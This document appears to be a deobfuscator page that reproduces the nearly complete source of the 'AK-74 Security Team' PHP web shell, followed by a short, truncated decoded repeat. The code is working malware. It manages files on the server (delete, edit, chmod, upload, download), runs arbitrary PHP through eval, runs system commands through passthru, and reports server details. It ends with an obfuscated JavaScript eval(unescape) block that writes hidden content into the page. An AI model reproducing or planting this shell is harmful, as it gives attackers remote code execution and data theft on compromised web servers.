Decoded the code below.
<?php $GLOBALS["iknpldrpigo"] = "content"; $GLOBALS["olmwrdqid"] = "timestart"; $GLOBALS["fdxvupxbx"] = "shell"; $hilzzmbb = "content"; $GLOBALS["shdxowcvsq"] = "fp"; $GLOBALS["kdhmhcnuk"] = "files"; $GLOBALS["hdyzecu"] = "number"; $GLOBALS["gyyylpy"] = "content"; $GLOBALS["cvvtiemv"] = "dirs"; $...
Obfuscated php code
003 | $GLOBALS["iknpldrpigo"] = "content"; |
004 | $GLOBALS["olmwrdqid"] = "timestart"; |
005 | $GLOBALS["fdxvupxbx"] = "shell"; |
006 | $hilzzmbb = "content"; |
007 | $GLOBALS["shdxowcvsq"] = "fp"; |
008 | $GLOBALS["kdhmhcnuk"] = "files"; |
009 | $GLOBALS["hdyzecu"] = "number"; |
010 | $GLOBALS["gyyylpy"] = "content"; |
011 | $GLOBALS["cvvtiemv"] = "dirs"; |
012 | $nfhhbmkrpia = "content"; |
013 | $bcaxbgujhqyk = "content"; |
014 | $GLOBALS["kqhombvoisgz"] = "xshell"; |
015 | $GLOBALS["nwkrhqdzrcw"] = "res"; |
016 | $GLOBALS["fzszjgc"] = "info"; |
017 | $GLOBALS["fvyvgcirdxx"] = "path"; |
018 | $GLOBALS["pgctubg"] = "perms"; |
019 | $GLOBALS["kmdyudoev"] = "sec"; |
020 | $GLOBALS["xcglkyuot"] = "dir"; |
021 | $GLOBALS["hoyoqwd"] = "mas"; |
022 | $GLOBALS["vtpgxuvxbi"] = "file"; |
023 | $osezbewemuin = "content"; |
024 | $GLOBALS["dwjodtpv"] = "handle"; |
025 | $GLOBALS["wdyvqrczdgu"] = "i"; |
027 | $dbmeztzpbjd = "content"; |
029 | $yuabcquera = "xshell"; |
032 | $wupyapffrye = "content"; |
033 | $xshell = $SERVER_["PHP_SELF"]; |
038 | $GLOBALS["qzgebdlknl"] = "mas"; |
042 | if ($handle = opendir($_SESSION["currentdir"])) { |
043 | $GLOBALS["qmdtpcoeduj"] = "handle"; |
044 | $GLOBALS["zoaynvkz"] = "file"; |
045 | while (false !== ($file = readdir($handle))) { |
047 | if (!is_dir($_SESSION["currentdir"] . "/" . $file)) { |
048 | $GLOBALS["sntlhgwvrnz"] = "file"; |
049 | $GLOBALS["mpyjuxikn"] = "i"; |
050 | $iwkugxydfbd = "file"; |
054 | $mas[$i]["filename"] = $file; |
055 | $GLOBALS["nhauqglig"] = "mas"; |
057 | $mas[$i]["filesize"] = filesize($_SESSION["currentdir"] . "/" . $file); |
058 | $mas[$i]["lastmod"] = date("H.i/d.m.Y", filemtime($_SESSION["currentdir"] . "/" . $file)); |
069 | $ovnbdybfxfn = "mas"; |
070 | $GLOBALS["mscjpo"] = "mas"; |
072 | if ($handle = opendir($_SESSION["currentdir"])) { |
073 | $GLOBALS["hobugedqduo"] = "dir"; |
074 | $GLOBALS["xwlfufyf"] = "handle"; |
075 | while (false !== ($dir = readdir($handle))) { |
076 | $GLOBALS["iebmlxxk"] = "dir"; |
078 | $ulkfkgvahbq = "mas"; |
079 | if ($dir != "." && is_dir($_SESSION["currentdir"] . "/" . $dir)) { |
085 | return ${$ovnbdybfxfn}; |
089 | if ($_SESSION["currentdir"] . "/" == $_SERVER["DOCUMENT_ROOT"]) { |
092 | if (strpos($_SESSION["currentdir"], str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"])) === false) { |
095 | return str_replace($_SERVER["DOCUMENT_ROOT"], "", $_SESSION["currentdir"] . "/"); |
097 | function removefile() |
099 | if (file_exists($_GET["file"])) { |
100 | chmod($_GET["file"], 0777); |
101 | if (unlink($_GET["file"])) { |
102 | return "File deleted!"; |
104 | return "File deleted!"; |
107 | return "File not found!"; |
112 | chmod($_GET["dir"], 0777); |
113 | if (rmdir($_GET["dir"])) { |
114 | return "Directory deleted!"; |
116 | return "Directory not found!"; |
119 | function getmicrotime() |
121 | $GLOBALS["azoxuqxbstyx"] = "sec"; |
122 | $nyzhvmuivi = "usec"; |
123 | $GLOBALS["gpoxftmel"] = "usec"; |
124 | list($usec, $sec) = explode(" ", microtime()); |
125 | return (double) $usec + (double) $sec; |
127 | function getpermission($path) |
131 | $qusckboendqg = "info"; |
135 | $perms = fileperms($path); |
137 | $qelozowxyjq = "perms"; |
139 | $qgfxtbdfnruf = "perms"; |
140 | $siebgehypj = "info"; |
142 | $GLOBALS["uchwntfz"] = "info"; |
143 | $GLOBALS["jckaac"] = "perms"; |
144 | if (($perms & 0xc000) == 0xc000) { |
146 | } elseif (($perms & 0xa000) == 0xa000) { |
148 | } elseif (($perms & 0x8000) == 0x8000) { |
150 | } elseif (($perms & 0x6000) == 0x6000) { |
152 | } elseif (($perms & 0x4000) == 0x4000) { |
154 | } elseif (($perms & 0x2000) == 0x2000) { |
156 | } elseif (($perms & 0x1000) == 0x1000) { |
161 | $info .= $perms & 0x100 ? "r" : "-"; |
162 | $info .= $perms & 0x80 ? "w" : "-"; |
163 | $info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); |
164 | ${$qusckboendqg} .= $perms & 0x20 ? "r" : "-"; |
166 | $info .= ${$tyfxbbfd} & 0x10 ? "w" : "-"; |
167 | $info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); |
168 | $GLOBALS["xqayvij"] = "perms"; |
169 | $info .= $perms & 0x4 ? "r" : "-"; |
170 | ${$umyijesr} .= $perms & 0x2 ? "w" : "-"; |
171 | ${$tynbdsso} .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); |
174 | function getpermissionarray($path) |
177 | $GLOBALS["ffvutedscs"] = "perms"; |
179 | $GLOBALS["mospvgr"] = "path"; |
180 | $perms = fileperms($path); |
181 | $GLOBALS["secvlqatfohv"] = "perms"; |
182 | $GLOBALS["bzngcqtouq"] = "perms"; |
183 | $GLOBALS["aboxvtoyg"] = "perms"; |
185 | $GLOBALS["woyxpuac"] = "res"; |
186 | $GLOBALS["mdbgzpglccyj"] = "perms"; |
187 | $ccbjnaxobblr = "res"; |
190 | $GLOBALS["vdddnl"] = "res"; |
192 | if (($perms & 0xc000) == 0xc000) { |
194 | } elseif (($perms & 0xa000) == 0xa000) { |
196 | } elseif (($perms & 0x8000) == 0x8000) { |
198 | } elseif (($perms & 0x6000) == 0x6000) { |
200 | } elseif (($perms & 0x4000) == 0x4000) { |
202 | } elseif (($perms & 0x2000) == 0x2000) { |
204 | } elseif (($perms & 0x1000) == 0x1000) { |
209 | $GLOBALS["nfmqqbwyhr"] = "perms"; |
210 | $res[] = $perms & 0x100 ? "r" : "-"; |
211 | $GLOBALS["rmhkov"] = "res"; |
212 | $res[] = $perms & 0x80 ? "w" : "-"; |
213 | $res[] = $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); |
214 | $res[] = $perms & 0x20 ? "r" : "-"; |
215 | $res[] = $perms & 0x10 ? "w" : "-"; |
216 | ${$fbhqupebtq}[] = $perms & 0x8 ? ${$filvvij} & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); |
217 | $GLOBALS["gxyvyqrjw"] = "perms"; |
218 | ${$otymmkoxf}[] = $perms & 0x4 ? "r" : "-"; |
220 | $res[] = $perms & 0x2 ? "w" : "-"; |
221 | ${$gkufmuhelf}[] = $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); |
222 | return ${$iaorpkyboh}; |
224 | function outputhead() |
228 | $res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\n<body>\n<STYLE>\nA:link {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:active {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:visited {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:hover {\n\tCOLOR: #C10000; TEXT-DECORATION: underline\n}\nTD {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\n}\nBODY {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \n}\n</STYLE>\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\n <tr>\n <td colspan=7 align=\"center\">\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: \n::.</font></b>\n </td>\n </tr>"; |
231 | function outputmenu() |
234 | $GLOBALS["omlmyuabmc"] = "res"; |
235 | $jrizoflsr = "xshell"; |
236 | $GLOBALS["kzvefdrkoqf"] = "res"; |
238 | $txbsfjnhvi = "xshell"; |
239 | $res .= "<tr>\n <td colspan=7 align=\"center\">\n <table border=0 cellspacing=0 cellpadding=0>\n <tr align=\"center\">\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=info\">General information</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=filemanager\">File manager</a>\n\t </td>\n\t <td width=80>\n\t <a href=\"" . $xshell . "?act=phpinfo\" target=\"_blank\">phpinfo()</a>\n\t </td>\n\t <td width=110>\n\t <a href=\"" . $xshell . "?act=execute\">Run PHP</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=exesys\">Execute the command</a>\n\t </td>\n </tr>\n </table>\n </td>\n </tr>"; |
242 | function outputdown() |
245 | $GLOBALS["srzeskty"] = "res"; |
246 | $res = "</table></div></body></html>"; |
249 | function outputfilemanager() |
251 | $GLOBALS["udmmztjca"] = "xshell"; |
252 | $GLOBALS["ychruqucrf"] = "xshell"; |
253 | $powlcxkoeay = "files"; |
254 | $shvztfinhxe = "dirs"; |
255 | $ckrwmyieozcl = "res"; |
256 | $GLOBALS["vmuyoysyoe"] = "res"; |
257 | $GLOBALS["orpfxw"] = "res"; |
258 | $GLOBALS["tuwswjh"] = "res"; |
259 | $GLOBALS["acmzbxffk"] = "res"; |
261 | $GLOBALS["vdtvfpbhyru"] = "number"; |
262 | $uxuysqwhok = "files"; |
264 | $GLOBALS["sejtvw"] = "dirs"; |
266 | $dirs = $this->getdirs(); |
267 | $files = $this->getfiles(); |
268 | $GLOBALS["asxszifet"] = "i"; |
271 | $res .= "\n <tr>\n <td colspan=7 align=\"center\">\n <font color=#830000> The current directory:</font><b><font color=#830000>" . $_SESSION["currentdir"] . "</font></b>\n </td>\n </tr>\n <tr align=\"center\">\n <td width=30>\n \n </td>\n <td width=330>\n \n </td>\n <td width=80><font color=#830000>,</font> <b><font color=#830000>byte</font></b>\n \n </td>\n <td width=120><font color=#830000>\n Recent change\n </font>\n </td>\n <td width=80 align=\"center\"><font color=#830000>Access right</font>\n \n </td>\n <td width=30>\n \n </td>\n <td width=30>\n \n </td>\n </tr>"; |
274 | $GLOBALS["wyqypgtjmi"] = "i"; |
275 | for ($i = 0; ${$qflffdcxsrx} < count(${$shvztfinhxe}); $i++) { |
276 | $GLOBALS["vapieoe"] = "res"; |
278 | $GLOBALS["uvckfgaxtwdw"] = "res"; |
280 | $GLOBALS["wjjxsx"] = "xshell"; |
281 | $GLOBALS["bbrtstbve"] = "dirs"; |
282 | $GLOBALS["jeyjcbtlodsa"] = "dirs"; |
283 | $GLOBALS["ywnqtawj"] = "i"; |
284 | $GLOBALS["fxthzy"] = "dirs"; |
285 | $res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td><td><b><a href=\"" . $xshell . "?act=filemanager&dir=" . $dirs[$i] . "\">" . $dirs[$i] . "</a></b></td><td> </td><td> </td><td>"; |
286 | $res .= "<a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $dirs[$i]) . "</a>"; |
287 | $res .= "</td><td> </td><td><a href=\"" . $xshell . "?act=filemanager&act3=del&dir=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">delete</a></td></tr>"; |
289 | for (${$kshyqqibce} = 0; $i < count($files); $i++) { |
290 | $GLOBALS["gkyyblyqymf"] = "i"; |
293 | $gruvymtvqist = "xshell"; |
294 | $GLOBALS["qwtxsjlqhhf"] = "files"; |
295 | $evvwgjhmulxe = "files"; |
296 | $GLOBALS["tefzqpvhph"] = "files"; |
297 | $GLOBALS["omvsytrtatv"] = "i"; |
298 | $GLOBALS["ypsmanoevl"] = "i"; |
300 | $ihduysxmqju = "res"; |
301 | $GLOBALS["tkghkgf"] = "res"; |
302 | $res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td>"; |
303 | $res .= "<td><a href=\"" . $xshell . "?act=down&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $files[$i]["filename"] . "</a></td>"; |
304 | $res .= "<td> " . $files[$i]["filesize"] . "</td>"; |
305 | $khftnbmpvvs = "xshell"; |
306 | $res .= "<td align=\"center\">" . $files[$i]["lastmod"] . "</td>"; |
307 | $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $files[$i]["filename"]) . "</a></td>"; |
309 | $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=edit&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">edit</a></td>"; |
310 | $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=filemanager&act2=del&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">delete</a></td></tr>"; |
312 | ${$ckrwmyieozcl} .= "</table><br>"; |
313 | $res .= "<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">"; |
315 | $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"mkdir\"><b><font color=#830000> :</b></font> </td><td><input type=\"text\" name=\"dircreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; |
316 | $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"createfile\"><b><font color=#830000> :</b></font></td><td> <input type=\"text\" name=\"filecreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; |
317 | $res .= "<tr><td align=center><form enctype=\"multipart/form-data\" action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"uploadfile\"><b><font color=#830000> :</font></b></td><td><input type=\"file\" name=\"filename\" size=\"23\"> <b><font color=#830000> </b></font></td><td> <input type=\"text\" name=\"filename2\"><input type=\"submit\" value=\"\"></form></td></tr>"; |
318 | $res .= "<table border=0 width=\"700\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">"; |
319 | ${$hjbbitpe} .= "<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
322 | function outputinfo() |
324 | $vbgcqwfncvvz = "res"; |
327 | $res .= "<tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>General information about the server</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"left\"><br>\n <ol>\n <b><font color=#830000>1. OS - </font></b><font color=#830000>" . php_uname() . "</font><br><br>\n <b><font color=#830000>2. PHP - </font></b><font color=#830000>" . phpversion() . "</font><br><br>\n <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - " . get_current_user() . " <b><font color=#830000>|| User ID</font></b> - " . getmyuid() . " <b><font color=#830000>|| Group ID</b></font> - " . getmygid() . "</font><br><br>\n <b><font color=#830000>4. Server Software - </font></b><font color=#830000>" . getenv("SERVER_SOFTWARE") . "</font><br><br>\n <b><font color=#830000>5. Request Method - </font></b><font color=#830000>" . getenv("REQUEST_METHOD") . "</font><br><br>\n <b><font color=#830000>6. Server IP - </font></b><font color=#830000>" . getenv("SERVER_ADDR") . "</font><br><br>\n <b><font color=#830000>7. Your IP - </font></b><font color=#830000>" . getenv("REMOTE_ADDR") . "</font><br><br>\n\t<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>" . getenv("HTTP_X_FORWARDED_FOR") . "</font><br><br>\n</td>\n </tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
330 | function chmodform($file) |
332 | $istixexbyxa = "file"; |
335 | $GLOBALS["nwfedck"] = "perms"; |
337 | $perms = $this->getpermissionarray($file); |
338 | $GLOBALS["ynokejbtuh"] = "perms"; |
339 | $GLOBALS["ngqiunigukfh"] = "perms"; |
342 | $GLOBALS["ykexebt"] = "res"; |
343 | $GLOBALS["pefltgfgwzb"] = "i"; |
345 | $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"chmod\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Changing access permissions</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; |
347 | $res .= "<tr align=\"center\"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>"; |
348 | $GLOBALS["yggjmwlv"] = "res"; |
349 | $res .= "<tr><td><input type=\"hidden\" name=\"perms0\" value=\"" . $perms[0] . "\">" . $perms[0] . "</td>"; |
350 | for ($i = 1; $i <= 9; $i++) { |
351 | $res .= "<td><input type=\"checkbox\" name=\"perms" . ${$ftrxmefkqxh} . "\"" . ($perms[${$yvdvvaai}] != "-" ? " checked" : "") . "></td>"; |
353 | $res .= "</tr><tr><td colspan=10 align=\"right\"><input type=\"submit\" value=\"Save\"></td></tr>"; |
354 | $res .= "</table></td></tr></form>"; |
357 | function editfileform($file) |
360 | $GLOBALS["wcqoifupsbh"] = "file"; |
361 | $yyvjrmlhyubj = "fp"; |
362 | $fp = fopen($file, "r"); |
369 | $GLOBALS["ryysceaq"] = "res"; |
370 | $GLOBALS["yjdeuf"] = "res"; |
371 | $GLOBALS["kwyxxau"] = "file"; |
372 | $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"editfile\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\"><tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Edit the file</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; |
373 | $res .= "<tr><td><textarea rows=25 cols=100 name=\"filecontent\">" . htmlspecialchars(fread(${$rwaotihpr}, filesize($file))) . "</textarea></td></tr>"; |
374 | $res .= "<tr><td align=\"right\"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=" . $file . "> - <input type=\"submit\" value=\"Edit\"></td></tr>"; |
375 | $res .= "</table></td></tr></form>"; |
376 | fclose(${$yyvjrmlhyubj}); |
379 | function executeform() |
381 | $GLOBALS["gbbivqermof"] = "xshell"; |
382 | $GLOBALS["jcoxegkjqmx"] = "res"; |
384 | $res .= "<form action=\"" . $xshell . "?act=execute\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"execute\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Executing PHP code<br> Opening and closing PHP code ( <? ?> ) no need to write!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name=\"phpcode\">"; |
385 | $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
392 | eval(stripslashes($_POST["phpcode"])); |
396 | function exesysform() |
400 | $GLOBALS["lmwlmrqw"] = "res"; |
401 | $GLOBALS["ubwopher"] = "res"; |
402 | $res .= "<form action=\"" . $xshell . "?act=exesys\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"exesys\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Execute system commands!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name=\"cmmd\">"; |
403 | $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"Perform\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"https://www.r57.gen.tr/\" title=\"r57.gen.tr\">r57.gen.tr</a> - <a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; |
408 | $GLOBALS["yvcpokfc"] = "result"; |
411 | $result = passthru($_POST["cmmd"]); |
415 | function editfile($file) |
417 | if (!empty($_POST["rename"])) { |
418 | rename($_POST["file"], $_POST["rename"]); |
420 | $fp = fopen($_POST["rename"], "w"); |
424 | fwrite($fp, stripslashes($_POST["filecontent"])); |
428 | function chmodfile($file) |
431 | $ipjaivcsdnlk = "res"; |
432 | $sgwdghqlhfy = "res"; |
433 | $GLOBALS["pufgvr"] = "res"; |
434 | $fcpofletrcs = "res"; |
435 | $GLOBALS["ikiudyniptdh"] = "res"; |
436 | $GLOBALS["lzykxw"] = "res"; |
439 | $tulbauxmvcdt = "res"; |
443 | switch ($_POST["perms0"]) { |
448 | $res = ${$gorewqwudp} | 0xa000; |
451 | ${$hlfwyxuk} |= 0x8000; |
468 | $GLOBALS["xeomnnbyudw"] = "res"; |
469 | if (isset($_POST["perms1"])) { |
472 | if (isset($_POST["perms2"])) { |
473 | $res = ${$tpmdfbgb} | 0x80; |
475 | if (isset($_POST["perms3"])) { |
476 | $res = ${$txyrsfflh} | 0x40; |
478 | if (isset($_POST["perms4"])) { |
479 | ${$feixofkogs} = $res | 0x20; |
481 | if (isset($_POST["perms5"])) { |
484 | if (isset($_POST["perms6"])) { |
485 | $res = ${$tulbauxmvcdt} | 0x8; |
487 | if (isset($_POST["perms7"])) { |
488 | $res = ${$fcpofletrcs} | 0x4; |
490 | if (isset($_POST["perms8"])) { |
493 | if (isset($_POST["perms9"])) { |
496 | echo substr(sprintf("%o", $res), 4); |
497 | return chmod($file, intval(substr(sprintf("%o", $res), 4), 8)); |
499 | function downloadfile($file) |
502 | header("Content-Type: application/octet-stream"); |
503 | header("Content-Length: " . filesize($file)); |
504 | header("Content-Disposition: attachment; filename={$file}"); |
510 | if (!empty($_POST["dircreate"])) { |
511 | if (mkdir($_SESSION["currentdir"] . "/" . $_POST["dircreate"])) { |
512 | return "Directory created!"; |
515 | return "Error creating directory"; |
517 | function createfile() |
519 | if (!empty($_POST["filecreate"])) { |
520 | $GLOBALS["lwhsyzdtepf"] = "fp"; |
521 | if (file_exists($_SESSION["currentdir"] . "/" . $_POST["filecreate"])) { |
524 | $fp = fopen($_SESSION["currentdir"] . "/" . $_POST["filecreate"], "w"); |
531 | return "Error creating file"; |
533 | function uploadfile() |
535 | if ($_FILES["filename"]["error"] != 0) { |
538 | $_POST["filename2"] = trim($_POST["filename2"]); |
539 | if (empty($_POST["filename2"])) { |
540 | $_POST["filename2"] = $_FILES["filename"]["name"]; |
542 | if (!copy($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) { |
543 | if (!move_uploaded_file($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) { |
544 | return "File download failed..."; |
547 | return "The file was uploaded successfully!"; |
551 | $timestart = $shell->getmicrotime(); |
553 | if (!isset($_SESSION["currentdir"])) { |
554 | $_SESSION["currentdir"] = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]); |
556 | if (isset($_GET["dir"])) { |
557 | if (opendir(realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]))) { |
558 | $_SESSION["currentdir"] = realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]); |
560 | Header("Location: {$xshell}?act=filemanager"); |
562 | $_SESSION["currentdir"] = str_replace("\\", "/", $_SESSION["currentdir"]); |
563 | $bxmeyfko = "content"; |
564 | if (substr($_SESSION["currentdir"], 1, 1) == "/") { |
565 | $_SESSION["currentdir"] = substr($_SESSION["currentdir"], 0, 1); |
567 | $GLOBALS["lvsmiwfpysj"] = "content"; |
568 | switch ($_POST["action"]) { |
570 | if ($shell->chmodfile($_POST["file"])) { |
571 | ${$GLOBALS["iknpldrpigo"]} .= "The change was successful"; |
575 | if ($shell->editfile($_POST["file"])) { |
576 | ${$wupyapffrye} .= "The edit was successful"; |
586 | ${$GLOBALS["iknpldrpigo"]} .= $shell->createdir(); |
589 | ${$dbmeztzpbjd} .= $shell->createfile(); |
592 | ${$GLOBALS["iknpldrpigo"]} .= $shell->uploadfile(); |
595 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputhead(); |
596 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputmenu(); |
597 | switch ($_GET["act"]) { |
599 | ${$GLOBALS["gyyylpy"]} .= $shell->editfileform($_GET["file"]); |
602 | ${$GLOBALS["lvsmiwfpysj"]} .= $shell->chmodform($_GET["file"]); |
605 | ${$GLOBALS["iknpldrpigo"]} .= $shell->downloadfile($_GET["file"]); |
608 | if ($_GET["act2"] == "del") { |
609 | ${$bxmeyfko} .= $shell->removefile(); |
611 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputfilemanager(); |
612 | if ($_GET["act3"] == "del") { |
613 | ${$hilzzmbb} .= $shell->removedir(); |
620 | ${$bcaxbgujhqyk} .= $shell->outputinfo(); |
623 | ${$GLOBALS["iknpldrpigo"]} .= $shell->executeform(); |
626 | ${$GLOBALS["iknpldrpigo"]} .= $shell->exesysform(); |
629 | ${$GLOBALS["iknpldrpigo"]} .= $shell->outputdown(); |
630 | echo ${$osezbewemuin}; |
631 | echo "<center>Generation time: " . ($shell->getmicrotime() - ${$GLOBALS["olmwrdqid"]}) . "</center>"; |
632 | echo "<script type=\"text/javascript\">\n<!-- \neval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%32%64%38%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%30%38%35%35%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%36%31%36%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%32%64%38%63%28%27') + '%30%6b%5b%62%63%6e%6e%11%69%6d%5d%30%19%64%6a%6a%60%32%2f%2b%78%75%76%26%6d%2c%35%20%67%57%66%20%6e%63%2d%74%5b%75%5e%67%74%2f%55%63%74%24%6b%69%1d%36%33%2a%69%5b%6c%6b%68%6a%3412108557%35%37%37%39%31%37%33' + unescape('%27%29%29%3b'));\n// -->\n</script>\n"; |
Decoded(de-Obfuscated) php code
003 | $GLOBALS["iknpldrpigo"] = "content"; |
004 | $GLOBALS["olmwrdqid"] = "timestart"; |
005 | $GLOBALS["fdxvupxbx"] = "shell"; |
006 | $hilzzmbb = "content"; |
007 | $GLOBALS["shdxowcvsq"] = "fp"; |
008 | $GLOBALS["kdhmhcnuk"] = "files"; |
009 | $GLOBALS["hdyzecu"] = "number"; |
010 | $GLOBALS["gyyylpy"] = "content"; |
011 | $GLOBALS["cvvtiemv"] = "dirs"; |
012 | $nfhhbmkrpia = "content"; |
013 | $bcaxbgujhqyk = "content"; |
014 | $GLOBALS["kqhombvoisgz"] = "xshell"; |
015 | $GLOBALS["nwkrhqdzrcw"] = "res"; |
